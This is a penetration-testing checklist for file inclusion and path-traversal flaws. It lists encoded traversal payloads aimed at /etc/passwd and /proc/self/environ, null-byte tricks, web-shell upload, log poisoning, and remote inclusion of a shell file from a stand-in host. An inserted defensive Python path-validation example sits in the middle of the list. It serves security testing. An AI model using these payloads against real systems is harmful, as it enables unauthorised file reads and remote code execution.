  1. Initial Information Gathering

    • Identify and map all endpoints that accept file path inputs.
    • Review source code (if available) to understand file handling mechanisms.
    • Check for endpoints where file paths are passed as parameters in URLs, headers, or body.
  2. Basic LFI Testing

    • ../../../../etc/passwd
    • ..%2F..%2F..%2F..%2Fetc%2Fpasswd
    • ../../../../../../../../../../../etc/passwd
    • Try to include different system files (e.g., /etc/hosts, /proc/version, C:\Windows\win.ini).
  3. Path Traversal

    • URL encoding: %2e%2e%2f
    • Double URL encoding: %252e%252e%252f
    • Unicode encoding: ..%c0%af..%c0%af..%c0%af
    • Test bypass techniques for traversal filters (e.g., null bytes such as %00, appending slashes).
  4. Advanced Path Traversal Techniques

    • Test for double encoding vulnerabilities.
    • Try bypassing filters with non-standard encodings and mixed encodings.
    • Use directory traversal sequences with variations like:
      • ....//
      • ....\/
      • %2e%2e%2f%2e%2e%2f
  5. File Inclusion and Execution

    • /etc/passwd (Linux)
    • /proc/self/environ
    • /proc/self/fd/0
    • C:\Windows\win.ini (Windows)
    • Test for inclusion of log files, configuration files, or other readable files.
  6. Null Byte Injection

    • /etc/passwd%00
    • C:\Windows\win.ini%00
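Added example (not part of the original checklist): a Python path-resolution check of the kind a defender places in front of the file-reading code, which collapses the encodings from sections 3, 4 and 6 (single, double and mixed percent-encoding, overlong UTF-8 such as %c0%af, null bytes) before confining the result to a document root. BASE_DIR is an assumed value, not taken from the checklist.

```python
import os
from urllib.parse import unquote_to_bytes

# Assumed document root for the example (not from the checklist).
BASE_DIR = "/var/www/app/public"


def normalize_input(raw: str, max_rounds: int = 3) -> bytes:
    """Percent-decode repeatedly, bounded, so single, double and mixed
    encodings all collapse to the same raw bytes before any check runs."""
    value = raw.encode("utf-8")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_safe_path(base_dir: str, user_path: str):
    """Return the absolute path the request maps to inside base_dir,
    or None when it must be rejected. Rejections cover null bytes,
    invalid/overlong UTF-8 (e.g. %c0%af), and any path that escapes
    base_dir once '..', '.', backslashes and symlinks are resolved."""
    raw = normalize_input(user_path)
    if b"\x00" in raw:            # a null byte would truncate the path in C APIs
        return None
    try:
        candidate = raw.decode("utf-8")   # strict: overlong %c0%af is rejected
    except UnicodeDecodeError:
        return None
    candidate = candidate.replace("\\", "/")   # treat '\' as a separator too
    base = os.path.realpath(base_dir)
    # Always treat the input as relative, then let realpath collapse '..'
    # sequences (....// is just an odd filename once nothing strips '../')
    # and follow symlinks before the containment check.
    resolved = os.path.realpath(os.path.join(base, candidate.lstrip("/")))
    if resolved != base and not resolved.startswith(base + "/"):
        return None
    return resolved


if __name__ == "__main__":
    for probe in ["images/logo.png", "../../../../etc/passwd",
                  "%252e%252e%252fetc/passwd", "..%c0%af..%c0%afetc/passwd",
                  "/etc/passwd%00", "....//....//etc/passwd"]:
        print(f"{probe!r:40} -> {resolve_safe_path(BASE_DIR, probe)}")
```

Note that the `....//` variant survives as a harmless filename here because the check canonicalises instead of stripping `../`, which is the filter behaviour that variant is designed to bypass.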
  7. File Upload and Inclusion

    • Check if file upload functionalities are present and try uploading files for inclusion.
    • Test inclusion of uploaded files to execute code (e.g., web shells).
  8. Log Poisoning and Inclusion

    • Inject payload into User-Agent, Referer, or other headers.
    • Include poisoned log files to execute injected payloads.
  9. Remote File Inclusion (RFI)

    • Check if the application allows remote file inclusion.
    • Test including remote files via HTTP or FTP URLs:
      • http://example.com/shell.txt
      • ftp://example.com/shell.txt
  10. Error Handling and Response Analysis

    • Analyze server responses for clues about the presence of LFI vulnerabilities.
    • Look for error messages that disclose file paths or other sensitive information.
    • Verify if application stack traces are exposed in responses.